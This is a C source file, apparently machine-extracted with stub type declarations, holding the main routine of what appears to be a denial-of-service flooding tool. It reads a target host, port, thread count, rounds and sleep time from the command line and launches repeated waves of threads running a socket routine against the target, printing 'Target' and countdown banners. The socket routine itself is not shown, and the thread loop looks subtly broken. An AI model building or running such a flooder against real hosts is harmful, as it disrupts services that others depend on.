
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int pthread_t ;
struct TYPE_2__ {char* host_pthread; char* port_pthread; char* slp_pthread; } ;


 int atoi (char*) ;
 int exit (int) ;
 int header () ;
 int printf (char*,...) ;
 int pthread_create (int *,int *,void*,void*) ;
 int pthread_join (int ,int *) ;
 char* resolver (char*) ;
 int sleep (int) ;
 int sockz ;
 TYPE_1__* thread_data_array ;
 int usage (char*) ;

int main(int ac, char **av) {

 if(ac<6)
  usage(av[0]);

 int x,
     y,
     z,
     err;

 char *hosttmp,
      *port,
      *host,
      *slp;

 int sockets,
     rounds,
     slptime,
     countdown;

 hosttmp = av[1];
 port = av[2];
 sockets = atoi(av[3]);
 rounds = atoi(av[4]); countdown = rounds;
 slp = av[5];
 slptime = atoi(slp);

 if(rounds<40)
  usage(av[0]);

 host = resolver(hosttmp);

 pthread_t threads[rounds];

 header();

 printf("[!] Target: %s:%s\n",host,port);
 printf("[!] Threads: %d for each round\n",sockets);

 for(z=0;z<rounds;z++) {
  for(x=0;x<sockets;x++) {
   thread_data_array[x].host_pthread = host;
   thread_data_array[x].port_pthread = port;
   thread_data_array[x].slp_pthread = slp;

   if((err = pthread_create(&threads[x],((void*)0),(void*)&sockz, (void*)&thread_data_array[x])) == -1){

    printf("main: Can`t create thread\n");
    exit(-1);
   }

   for(y=0;y<sockets;y++)
   pthread_join(threads[y],((void*)0));

  }
  printf("[*] Countdown: %d | [!] Sleeping: %ds\n",countdown--,slptime);
  sleep(slptime);
 }
 printf("Done!\n");

 return 0;
}
